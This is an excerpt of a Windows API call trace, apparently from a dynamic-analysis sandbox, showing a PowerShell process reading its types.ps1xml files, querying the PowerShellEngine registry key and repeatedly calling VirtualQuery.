	[0310.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.002] SetErrorMode (uMode=0x1) returned 0x1
	[0310.003] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0310.004] GetFileType (hFile=0x334) returned 0x1
	[0310.004] SetErrorMode (uMode=0x1) returned 0x1
	[0310.004] GetFileType (hFile=0x334) returned 0x1
	[0310.006] ReadFile (in: hFile=0x334, lpBuffer=0x2d5fb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2d5fb08*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0310.008] ReadFile (in: hFile=0x334, lpBuffer=0x2d5fb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2d5fb08*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0310.008] ReadFile (in: hFile=0x334, lpBuffer=0x2d5fb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2d5fb08*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0310.009] ReadFile (in: hFile=0x334, lpBuffer=0x2d5fb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2d5fb08*, lpNumberOfBytesRead=0x1cd148*=0xcf3, lpOverlapped=0x0) returned 1
	[0310.009] ReadFile (in: hFile=0x334, lpBuffer=0x2d5ef63, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2d5ef63*, lpNumberOfBytesRead=0x1cd148*=0x0, lpOverlapped=0x0) returned 1
	[0310.009] ReadFile (in: hFile=0x334, lpBuffer=0x2d5fb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2d5fb08*, lpNumberOfBytesRead=0x1cd148*=0x0, lpOverlapped=0x0) returned 1
	[0310.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.012] SetErrorMode (uMode=0x1) returned 0x1
	[0310.012] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd0c0 | out: lpFileInformation=0x1cd0c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0310.012] SetErrorMode (uMode=0x1) returned 0x1
	[0310.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.013] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1a8 | out: phkResult=0x1cd1a8*=0x334) returned 0x0
	[0310.014] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd12c, lpData=0x0, lpcbData=0x1cd128*=0x0 | out: lpType=0x1cd12c*=0x1, lpData=0x0, lpcbData=0x1cd128*=0x56) returned 0x0
	[0310.014] CoTaskMemAlloc (cb=0x5a) returned 0x31b860
	[0310.014] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd0fc, lpData=0x31b860, lpcbData=0x1cd0f8*=0x56 | out: lpType=0x1cd0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd0f8*=0x56) returned 0x0
	[0310.014] CoTaskMemFree (pv=0x31b860) 
	[0310.014] RegCloseKey (hKey=0x334) returned 0x0
	[0310.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.588] GetSystemInfo (in: lpSystemInfo=0x1cbde0 | out: lpSystemInfo=0x1cbde0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0310.588] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0310.599] SetErrorMode (uMode=0x1) returned 0x1
	[0310.599] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0310.599] GetFileType (hFile=0x334) returned 0x1
	[0310.599] SetErrorMode (uMode=0x1) returned 0x1
	[0310.599] GetFileType (hFile=0x334) returned 0x1
	[0311.168] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.169] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.169] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.169] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.169] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.169] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.170] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.170] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.170] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.171] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.171] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.171] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.172] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.172] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.172] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.172] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.173] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.174] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.174] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.174] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.175] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.175] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.175] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.175] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.176] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.176] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.176] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.177] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.177] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.177] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.177] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.178] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.178] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.182] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.182] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.182] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.183] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.183] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.183] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.183] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.184] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.184] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x1b4, lpOverlapped=0x0) returned 1
	[0311.184] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd148, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x1cd148*=0x0, lpOverlapped=0x0) returned 1
	[0311.184] CloseHandle (hObject=0x334) returned 1
	[0311.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0311.184] SetErrorMode (uMode=0x1) returned 0x1
	[0311.185] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd0c0 | out: lpFileInformation=0x1cd0c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0311.185] SetErrorMode (uMode=0x1) returned 0x1
	[0311.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0311.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1a8 | out: phkResult=0x1cd1a8*=0x334) returned 0x0
	[0311.185] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd12c, lpData=0x0, lpcbData=0x1cd128*=0x0 | out: lpType=0x1cd12c*=0x1, lpData=0x0, lpcbData=0x1cd128*=0x56) returned 0x0
	[0311.185] CoTaskMemAlloc (cb=0x5a) returned 0x2f05a0
	[0311.185] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd0fc, lpData=0x2f05a0, lpcbData=0x1cd0f8*=0x56 | out: lpType=0x1cd0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd0f8*=0x56) returned 0x0
	[0311.185] CoTaskMemFree (pv=0x2f05a0) 
	[0311.185] RegCloseKey (hKey=0x334) returned 0x0
	[0311.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0311.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0312.330] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.898] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.900] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.901] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.902] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.903] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.905] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.907] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.919] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.919] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.919] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.919] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.919] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.919] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.920] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.920] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
